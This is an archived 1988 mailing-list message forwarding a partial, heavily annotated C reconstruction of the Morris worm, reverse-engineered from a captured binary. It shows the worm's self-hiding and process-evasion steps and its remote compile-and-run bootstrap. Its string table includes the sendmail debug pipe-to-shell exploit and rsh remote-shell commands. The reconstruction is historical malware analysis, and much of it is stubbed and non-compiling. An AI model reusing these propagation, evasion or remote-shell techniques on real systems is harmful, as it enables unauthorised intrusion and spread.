

ARCHIVE: 'Phage List' - Archives (1988 - 1989)
DOCUMENT: phage #182 [[becker@trantor.harris-atd.com: C code for part of worm]] (1 message, 3941 bytes)
SOURCE: http://securitydigest.org/exec/display?f=phage/archive/182.txt&t=text/plain
NOTICE: securitydigest.org recognises the rights of all third-party works.

START OF DOCUMENT

From: Jean Marie Diaz <jdiaz%oracle%hplabs@hplabs.HP.COM>
To: phage
Date: Fri 17:11:57 04/11/1988 EST
Subject: [becker@trantor.harris-atd.com: C code for part of worm]
References: [Thread Prev: 180] [Thread Next: 187] [Message Prev: 076] [Message Next: 043]



------- Forwarded Message

Received: by ATHENA-PO-2.MIT.EDU (5.45/4.7) id AA07174; Fri, 4 Nov 88 12:15:37 EST
Received: by ATHENA.MIT.EDU (5.45/4.7) id AA14060; Fri, 4 Nov 88 12:15:58 EST
Received: by trantor.harris-atd.com (5.51/1.14)
	id AA09158; Fri, 4 Nov 88 12:12:30 EST
Message-Id: <8811041712.AA09158@trantor.harris-atd.com>
Received: by disk.harris-atd.com (3.2/4.8) id AA01617; Fri, 4 Nov 88 12:11:58 EST
Date: Fri, 4 Nov 88 12:11:58 EST
From: Don Becker <becker@trantor.harris-atd.com>
To: sipb@athena.mit.edu
Subject: C code for part of worm


(I'm an old sipb member who was almost hit by the worm.  I thought
you might be interested.

Send mail for the up-to-minute version.  I should be finished by this
evening.)



/*****************************************************************************\
*									      *
*	File:     worm.c						      *
*	Author:   Don Becker						      *
*	Created:  Thu Nov  3 17:16:10 1988				      *
*	Contents: Reverse engineered worm program that invaded ATD on 11/3/88 *
*									      *
******************************************************************************/

#include <stdio.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <signal.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int nobjects = 0;	/* objects loaded from argv; main() exits unless at least one was loaded (presumably counted by loadobject()) */
int pleasequit;		/* set elsewhere; together with nextw > 0 it ends the main loop */
int nextw, nifs;	/* nifs: number of interfaces recorded by if_init(), bounds ifs[] */
char *null_auth;	/* not referenced anywhere in this listing */

/* These are the strings that are 'xor'ed with 0x81 in the binary.
 * The envNN names are byte offsets into that encoded data area (see the
 * "<environ+52>" note below); in this transcription they are already decoded
 * and declared as plain pointers, so the `XS(&envNN)` calls elsewhere should
 * be read as "the decoded string envNN" -- applied literally to a pointer's
 * bytes the call would not produce these strings.  The plain-text table at the
 * end of the file lists the remaining strings.
 * NOTE: `environ` here is the worm's own data area and collides with the name
 * of the C library's environment pointer; it is not the process environment. */

char environ[50] = "";
char *sh = "sh";
char *env52 = "sh";			/* 0x20034, <environ+52> */
char *env55 = "-p";			/* command-line flag: "-p <pid>" marks a bootstrapped start */
char *env58 = "l1.c";			/* name of the bootstrap source object main() insists on */
char *env63 = "sh";
char *env66 = "/tmp/.dump";
char *env77 = "128.32.137.13";		/* used by XSplus152() */
char *env91 = "127.0.0.1";
char *env102 = "/usr/ucb/netstat -r -n";	/* 0x20066 */
char *env125 = "r";				/* popen() mode for the command above */
char *env127 = "%s%s";			/* sscanf() format used on netstat output */

char *XS();		/* string decoder, defined below; returns a pointer into a shared ring buffer */

/* Per-interface record filled in by if_init() (fields named by byte offset).
 * Meanings inferred from use in netmaskfor(): l16 is compared as an address,
 * l24 is returned as a netmask; the other fields are not read in this listing. */
struct ifses {
    int l0, l4, l8, l12, l16, l20, l24;
    short l28;
} ifs[30];					/* Arbitrary */

/*
 * Entry point (0x20a0).  Reconstructed start-up sequence: overwrite argv[0]
 * with "sh", disable core dumps, load the object files named on the command
 * line, insist that "l1.c" is among them, scrub argv, enumerate interfaces,
 * and -- when started as "-p <pid>" by a bootstrap -- remove its on-disk
 * files and SIGKILL the parent before entering mainplus610().
 * Names of the form lN / envNN are stack and data offsets from the
 * disassembly, not original identifiers; l1 and l5 are never used here.
 */
main(argc, argv)		/* 0x20a0 */
     int argc;
     char **argv;
{
    int i, l1, pid_arg, j, cur_arg, l5;
    long key;			/* -28(fp) */
    struct rlimit rl;
   
    l1 = 0;
   
    /* Rewrite argv[0] in place so the process presumably appears as "sh" in
     * ps(1) output; strcpy() relies on the original argv[0] being at least as
     * long as the replacement. */
    strcpy(argv[0], XS(&env52)); /* "sh" */
    time(&key);
    srandom(key);
    /* Core-file size limit 0: a crash leaves no core image behind to analyse.
     * The setrlimit() result is deliberately ignored (empty statement). */
    rl.rlim_cur = 0;
    rl.rlim_max = 0;
    if (setrlimit(RLIMIT_CORE, &rl))
	;
    signal(SIGPIPE, SIG_IGN);	/* a peer closing a connection must not kill the process */
    pid_arg = 0;
    cur_arg = 1;
    /* "-p <pid>": started by the bootstrap; pid is the parent to kill later. */
    if  (argc > 2 &&
	 strcmp(argv[cur_arg], XS(&env55)) == 0) { /* env55 == "-p" */
	pid_arg = atoi(argv[2]);
	cur_arg += 2;
    }
    /* Remaining arguments are object files; fail hard if any does not load. */
    for(i = cur_arg; i < argc; i++) {	/* otherwise <main+286> */
	if (loadobject(argv[i]) == 0)
	    exit(1);
	if (pid_arg)
	    unlink(argv[i]);	/* bootstrapped: the staged copy on disk is no longer needed */
    }
    /* Refuse to continue without the l1.c bootstrap source among the objects. */
    if ((nobjects < 1) || (getobjectbyname(XS(&env58)) == 0)) /* "l1.c" */
	exit(1);
    if (pid_arg) {
	for(i = 0; i < 32; i++)
	    close(i);			/* drop every inherited descriptor 0..31 */
	unlink(argv[0]);		/* remove the running binary and the other staged files */
	unlink(XS(&env63));			/* "sh" */
	unlink(XS(&env66));			/* "/tmp/.dump" */
    }
   
    /* Overwrite every argument with NULs, presumably so the file names do not
     * show up in the process's argument list. */
    for (i = 1; i < argc; i++)
	for (j = 0;	argv[i][j]; j++)
	    argv[i][j] = '\0';
    if (if_init() == 0)
	exit(1);
    if (pid_arg) {					/* main+600 */
	/* Leave the bootstrap's process group first so the kill below does
	 * not take this process down with it. */
	if (pid_arg == getpgrp(getpid()))
	    setpgrp(getpid(), getpid());
	kill(pid_arg, 9);	/* signal 9 == SIGKILL: the parent cannot catch it */
    }
    mainplus610();
}						/* main+610 */

/*
 * Main loop (main+610).  Re-seeds random() from the clock, runs one round of
 * the hg/hl/ha/hi and cracksome() routines (none of which are in this
 * listing), then loops: the parent exits after each fork() so the surviving
 * child carries on under a new pid.  After twelve hours h_clean() is
 * invoked; setting pleasequit with nextw > 0 ends the loop.
 */
static mainplus610()
{
    long key, time1, time0;
   
    time(&key);
    srandom(key);
    time0 = key;		/* reference time for the 12-hour h_clean() check */
    if (hg() == 0 && hl() == 0)
	ha();
    checkother();		/* presumably checks for another running copy; body not in this listing */
    XS_152();		/* presumably the XSplus152() defined below; the two names differ in the transcription */
    cracksome();
    other_sleep(30);
    while (1) {
	cracksome();
	/* Parent exits, child continues: the pid changes every iteration
	 * (NOTE(review): presumably also to shed accumulated resource usage). */
	if (fork() > 0)
	    exit(0);
	if (hg() == 0 && hi() == 0 && ha() == 0)
	    hl();
	other_sleep(120);
	time(&time1);
	if (time1 - time0 >= 60*60*12)	/* twelve hours since start */
	    h_clean();
	if (pleasequit && nextw > 0)
	    exit(0);
    }
}

/* Ring buffer backing XS(): decoded strings are handed out sequentially from
 * trans_buf and the cursor trans_cnt wraps to 0 when the remaining tail is too
 * short, so a returned string stays valid only until later XS() calls have
 * consumed enough of the buffer to overwrite it.  trans_cnt is an implicit int. */
static trans_cnt;
static char trans_buf[NCARGS];

/*
 * Decode one of the 0x81-xor'ed strings (0x23fc).  The result is written
 * into the shared trans_buf ring buffer and a pointer into it returned; the
 * caller must not free it, and it is overwritten once later calls wrap
 * around.  Whether it is decoding or encoding is the same operation, so the
 * function is its own inverse.
 */
char *XS(str1)			/* 0x23fc */
     char *str1;
{
    char *out, *dst;
    int need;

    /* Reserve strlen+1 bytes; restart at the beginning of the buffer when
     * the tail cannot hold them. */
    need = strlen(str1) + 1;
    if (need > NCARGS - trans_cnt)
	trans_cnt = 0;
    out = &trans_buf[trans_cnt];
    trans_cnt += need;

    for (dst = out; *str1 != '\0'; str1++, dst++)
	*dst = *str1 ^ 0x81;
    *dst = '\0';
    return out;
}

/*
 * Called from the main loop (0x2494; the loop names it XS_152).  As
 * transcribed it proceeds only when random()/15 == 7, which the author flags
 * as not matching the original division instruction (a modulus is the more
 * plausible intent).  It then builds a sockaddr by hand and sends a single
 * byte to the address in env77.
 * What the hand-built sockaddr is: writing a 16-bit value at sa_data[0]
 * lands on sockaddr_in's sin_port and the inet_addr() result at sa_data[2]
 * on sin_addr, so this is a sockaddr_in filled through the generic struct.
 * NOTE(review): sendto() on an unconnected SOCK_STREAM socket is expected to
 * fail, and its result is ignored, so this most likely never transmits
 * anything; `msg` is also never initialised.
 */
static XSplus152(arg1, arg2)				/* 0x2494 */
{
    int s;
    struct sockaddr soka;
    char msg;
   
    if (7 != random()/((short)15))		/* This needs fixed. It does not*/
	return;					/* produce the same div instn. */
    bzero(&soka, sizeof(soka));
    soka.sa_family = AF_INET;
    /* sa_data[0..1] is sin_port: the multi-character constant supplies the
     * two port bytes (0x2c5d per the note). */
    *((short *)soka.sa_data) = '],';		/* 0x2c5d */
    *((int *)(&soka.sa_data[2])) =		/* sa_data[2..5] is sin_addr */
	inet_addr(XS(&env77));			/* "128.32.137.13" */
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
	return;
    if (sendto(s, &msg, 1, 0, &soka, sizeof(soka)))	/* result deliberately ignored */
	;
    close(s);
}

/*
 * Interface enumeration (0x254c): meant to fill nifs/ifs[] from the
 * kernel's interface list.  Only the set-up was recovered: the ioctl is
 * issued and an entry count derived, but the per-interface loop body is
 * missing, so as transcribed the function never returns 1 and falls off the
 * end without a return value (main() treats 0 as failure).
 * Returns 0 when the socket or the ioctl fails.
 */
if_init()					/* 0x254c */
{
    int *l0, l1;
    char foo[396];		/* presumably the buffer the interface list is returned into (384 bytes + slack) */
    int l408,l404,i;
    int s, l392;
    char foo1[60];
   
    nifs = 0;
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
	return 0;				/* if_init+1042 */
    l0 = &l392;
    l1 = 384;			/* length handed to the ioctl */
    /* 0xc0086914 is an ioctl request code, not an IP address: it decodes as
     * _IOWR('i', 20, <8-byte struct>), i.e. SIOCGIFCONF on 4.3BSD, which
     * returns the interface configuration list.  The argument as transcribed
     * (&l1) is only the length; in the binary it is presumably a struct ifconf
     * holding the length and a pointer to foo[]. */
    if (ioctl(s, 0xc0086914, &l1) < 0) {	/* SIOCGIFCONF, not 192.8.105.20 */
	close(s);
	return 0;				/* if_init+1042 */
    }
    /* Looks like compiler output for a signed divide of the returned length
     * by 32 (struct ifreq is 32 bytes on 4.3BSD), but the shift as
     * transcribed is <<, not >>; treat the count as unverified. */
    l404 = (l1< 0 ? l1+31 : l1) << 5;
    for(i = 0; i < l404; i++) {		/* if_init+144 */
	l408 = 0;
	if (l408 < nifs) {		/* never true as transcribed: nifs is still 0 */
	    /* per-interface processing (filling ifs[nifs]) not reconstructed */



	    ;
	}
    }
}

/*
 * Classful default mask for an address (0x2962), decided from the two
 * most significant bits: 0x -> 0xFF000000, 11 -> 0xFFFF0000,
 * 10 -> 0xFFFFFF00.  Note that the last two are the reverse of the usual
 * class B (/16) / class C (/24) convention; preserved as transcribed.
 * The mask is returned through an int, so callers see it as a negative value.
 */
int def_netmask(net_addr)				/* 0x2962 */
     int net_addr;
{
    switch ((unsigned int)net_addr >> 30) {	/* top two bits */
    case 0:
    case 1:					/* 0xxx */
	return 0xFF000000;
    case 3:					/* 11xx */
	return 0xFFFF0000;
    default:					/* 10xx */
	return 0xFFFFFF00;
    }
}

/*
 * Netmask to use for addr (0x29aa).  Starting from the classful default,
 * scan the interfaces recorded by if_init(): the first whose l16 field
 * shares addr's network under that default mask yields its l24 field as
 * the answer (field meanings inferred from this use).  Falls back to the
 * classful default when no interface matches.
 */
int netmaskfor(addr)				/* 0x29aa */
     int addr;
{
    int mask, k;

    mask = def_netmask(addr);
    k = 0;
    while (k < nifs) {
	if ((ifs[k].l16 & mask) == (addr & mask))
	    return ifs[k].l24;
	k++;
    }
    return mask;
}

int ngateways;		/* gateways collected by rt_init(); the read loop stops at 500 */
/*
 * Route-table discovery (0x2a26).  Runs "netstat -r -n" through popen()
 * and reads its output one line at a time, calling other_sleep(0) between
 * lines and stopping once 500 gateways have been collected.  Only the
 * fgets()/sscanf() skeleton was recovered; the per-line parsing and
 * rt_init_plus_544() (an empty stub below) are missing.
 * Returns 0 if the pipe cannot be opened, 1 otherwise.
 */
rt_init()					/* 0x2a26 */
{
    FILE *pipe;
    char input_buf[64];		/* lines longer than 63 bytes are read in pieces */
    int	 l204, l304;		/* stack slots passed to sscanf() as if they were char buffers */
   
    ngateways = 0;
    pipe = popen(XS(&env102), XS(&env125));	/*  "/usr/ucb/netstat -r -n", "r"*/
    if (pipe == 0)
	return 0;
    while (fgets(input_buf, sizeof(input_buf), pipe)) { /* to 518 */
	other_sleep(0);
	if (ngateways >= 500)
	    break;
	/* "%s%s" expects two char buffers; the transcription has not
	 * recovered them, so uninitialised ints are passed here. */
	sscanf(input_buf, XS(&env127), l204, l304);	/* "%s%s" */
						/* remaining per-line processing not reconstructed */


    }						/* 518, back to 76 */
    pclose(pipe);
    rt_init_plus_544();
    return 1;
}						/* 540 */

/* Stub (0x2c44): called at the end of rt_init(); body not reconstructed. */
static rt_init_plus_544()				/* 0x2c44 */
{
}

/* Stub (0x2e1a): body not reconstructed; not called from anything in this listing. */
getaddrs()					/* 0x2e1a */
{
}

/*
 * Round-trip an int through a static and return it (0x2f4a).  In the
 * binary this is presumably a helper that produces a struct in_addr from an
 * int for inet_ntoa(); only the copy survived reconstruction.  x3a20()
 * calls it with five arguments, of which only the first reaches this
 * definition.
 */
int a2in(a)						/* 0x2f4a */
     int a;
{
    static int local;

    local = a;
    return local;
}


/*
 * Drives the remote bootstrap over an already-open shell (x3a20; the
 * comments refer to it as the <hi+...> region).  arg2 appears to be the
 * descriptor commands are written to and arg1 the one replies are read
 * from: waithit_plus1594() writes a line, waithit_plus2412() waits with a
 * timeout for an echoed marker.  Sequence: set PATH, cd /usr/tmp, stream the
 * l1.c object into x<rand>.c via sed, compile and run it with the values
 * makemagic() supplied, wait for "DONE", then hand over to waithit().
 * Returns 0 on any failure.
 * Not recovered in this transcription: the lNNN stack slots (l516, l572,
 * l576, l580..l592) are undeclared, and `object` is indexed as if it were a
 * struct (object[4] a length, object[8] a data pointer) rather than a char *.
 */
x3a20(arg0, arg1, arg2)
{
    char *object;
    char local[40];
    char print_buf[512];			/* l568 */

    object = getobjectbyname(XS(&env201));	/* "l1.c" */
    if (object == NULL)
	return 0;				/* <hi+2128> */
    /* makemagic() supplies the address/port values used in the cc line
     * below; its body is not in this listing. */
    if (makemagic(arg0, l592, l580, l584, l588) == 0)
	return 0;
    waithit_plus1594(arg2, XS(&env206));	/* "PATH=/bin:/usr/bin:/usr/ucb\n" */
    waithit_plus1594(arg2, XS(&env235));	/* "cd /usr/tmp\n" */
    l576 = random() % 0x00FFFFFF;		/* random suffix for the x%d file names */

    sprintf(print_buf, XS(&env248), l576);	/* "x%d.c" */
    sprintf(&l516, XS(&env254), print_buf);
    /* "echo gorch49;sed \'/int zz;/q\' > %s;echo gorch50\n" */
    /* sed copies the remote shell's stdin into the file up to the "int zz;" line */
    waithit_plus1594(arg2, &l516);
   
    waithit_plus2412(arg1, XS(&env303), 10);	/* "gorch49": remote side is ready for the source */

    /* The object is presumably kept encoded in memory: decode in place,
     * write it out, re-encode. */
    xorbuf(object[8], object[4]);
    l572 = write(arg2, object[8], object[4]);
    xorbuf(object[8], object[4]);

    if (object[4] != l572) {			/* short write */
	close(l588);
	return 0;				/* to <hi+2128> */
    }
    waithit_plus1594(arg2, XS(&env311));	/* "int zz;\n\n" -- the line that stops sed */
    waithit_plus2412(arg1, XS(&env321), 30);	/* "gorch50" */

    sprintf(&l516, XS(&env329), l576, l576, l576,
	inet_ntoa(a2in(l592, l580, l584, l576, l576)));
	/* "cc -o x%d x%d.c;./x%d %s %d %d;rm -f x%d x%d.c;echo DONE\n" */
	/* NOTE(review): the format has eight conversions but only four
	 * arguments are passed here; the call is incompletely transcribed. */

    waithit_plus1594(arg2, &l516);

    if (waithit_plus2412(arg1, XS(&env387), 100) == 0) { /* "DONE" */
	close(l588);
	return 0;				/* <hi+2128> */
    }
    return waithit(arg0, l592, l580, l584, l588);
}

/* Stub: the author's note says this is the routine that does the 'cat'
 * (presumably the "cat > %s <<'EOF'" variant of the transfer seen in the
 * string table); body not reconstructed. */
waithit_plus12xx()
{}						/* Does the 'cat' */

/* Installed as a signal handler (0x4872): a no-op SIGALRM handler.  mail()
 * installs it before alarm(10) so that the alarm interrupts a blocking
 * connect() -- which then fails and the loop moves on -- instead of the
 * default action terminating the process. */
justreturn(sig, code, scp)					/* 0x4872 */
     int sig, code;
     struct sigcontext *scp;
{ }
/* Reconstructed record passed (by value) to mail().  oNN/lNN are byte
 * offsets within the struct; o48[] holds up to six IPv4 addresses, which
 * mail() assigns directly to sin_addr.s_addr.  Other fields are not read
 * in this listing. */
struct mag {
    short o0, o2;
    int l4, l8, l12, l16, l20, l24, o28, o32, o36, o40, o44;
    int o48[6];};

/*
 * SMTP delivery attempt (4d3c, <permute+162>).  Tries each address in
 * arg1.o48[] in turn and keeps the first TCP connection to IPPORT_SMTP that
 * succeeds, using alarm(10) with the no-op justreturn() handler as a
 * connect() timeout.  The SMTP conversation that follows (permute_plus1058
 * and the lp996 label) is not in this listing, so the function body ends
 * abruptly.
 * Transcription notes: `if (i < 6) return 0;` is on the path taken after a
 * *successful* connect (break leaves i < 6), so its sense is probably
 * inverted in the reconstruction; l548 is undeclared; the lp996 label does
 * not exist; o48[i] (an int) is compared with NULL; the old handler
 * returned by signal() is stored in an int.
 */
mail(arg0, arg1)				/* 4d3c <permute+162>*/
     struct mag arg1;
{
    int i, l8, l12, l16, s;
    struct sockaddr_in sin;
    char local[544];
    int l552, l556, l560, l564, l568;

    if (makemagic(arg1, &l556, &l560, &l564, &l568) == 0)	/* body not in this listing */
	return 0;				/* <permute+1054> */
    l552 = signal(SIGALRM, &justreturn);	/* so alarm() interrupts connect() */
    for( i = 0; i < 6; i++) {			/* to 430 */
	if (arg1.o48[i] == NULL)		/* unused slot */
	    continue;				/* to 422 */
	s = socket(AF_INET, SOCK_STREAM, 0);
	if (s < 0)
	    continue;				/* to 422 */

	bzero(&sin, sizeof(sin));		/* 16 */
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = arg1.o48[i];
	sin.sin_port = IPPORT_SMTP;		/* no htons(); byte order as transcribed */

	alarm(10);				/* ten-second connect timeout */
	if (connect(s, &sin, sizeof(sin)) < 0) {
	    alarm(0);
	    close(s);
	    continue;				/* to 422 */
	}
	alarm(0);
	break;					/* connected: s stays open */
    }
   
    /* See the note above: as transcribed this returns on the connected path. */
    if (i < 6)
	return 0;				/* 1054 */
    if (permute_plus1058( s, &l548) == 0)
	goto lp996;
   
    /* remainder of the SMTP exchange not reconstructed */
}


/*
 * Decoded string table recovered from the binary.  The envNN names used
 * above refer to positions within the encoded copy of these strings.  As
 * transcribed this is a single literal with embedded raw newlines, which no
 * standard C compiler accepts; it is documentation of the recovered strings
 * rather than compilable code.  The duplicated entries (PATH, l1.c,
 * /bin/sh, 127.0.0.1, quit) are present in the original table.
 */
char *text =
"default
0.0.0.0
127.0.0.1
exec /bin/sh
l1.c
PATH=/bin:/usr/bin:/usr/ucb
cd /usr/tmp
x%d.c
echo gorch49;sed '/int zz;/q' > %s;echo gorch50
gorch49
int zz;
gorch50
cc -o x%d x%d.c;./x%d %s %d %d;rm -f x%d x%d.c;echo DONE
DONE
x%d,%s
PATH=/bin:/usr/bin:/usr/ucb
rm -f sh
if [ -f sh ]
then
P=x%d
else
P=sh
cc -o $P %s
./$P -p $$
rm -f $P
rm -f %s $P
l1.c
cd /usr/tmp
x%d.c
cat > %s <<'EOF'
cc -o x%d x%d.c;x%d %s %d %d;rm -f x%d x%d.c
/usr/ucb/rsh
/usr/bin/rsh
/bin/rsh
/bin/echo %s
debug
mail from:</dev/null>
rcpt to:<"| sed '1,/^$/d' | /bin/sh ; exit 0">
data
quit
quit
exec /usr/ucb/rsh %s -l %s 'exec /bin/sh'
/bin/sh
/bin/sh
127.0.0.1
127.0.0.1
/etc/hosts.equiv
%.100s
/.rhosts
%.200s/.forward
%.20s%.20s
%[^ ,]
%*s %[^ ,]s
%.200s/.forward
%.200s/.rhosts
%s%s
/usr/dict/words";

------- End of Forwarded Message



------- End Forwarded Message

END OF DOCUMENT